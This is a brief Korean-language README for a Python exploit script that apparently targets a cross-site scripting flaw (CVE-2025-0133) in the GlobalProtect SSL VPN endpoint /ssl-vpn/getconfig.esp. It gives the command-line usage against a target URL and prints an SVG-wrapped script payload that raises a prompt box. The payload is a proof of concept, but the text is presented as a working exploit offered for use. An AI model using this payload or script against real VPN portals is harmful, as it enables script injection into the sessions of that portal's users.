
CVE-2025-0133 GlobalProtect XSS
🔓 GlobalProtect SSL VPN 엔드포인트 /ssl-vpn/getconfig.esp를 대상으로, URL에 제작된 XSS 페이로드를 추가하는 익스플로잇입니다.
python3 exploit.py -u https://target.com
-u, --url: 대상 기본 URL (쿼리 파라미터는 포함하지 마세요)<svg xmlns="http://www.w3.org/2000/svg"><script>prompt("mitsec")</script></svg>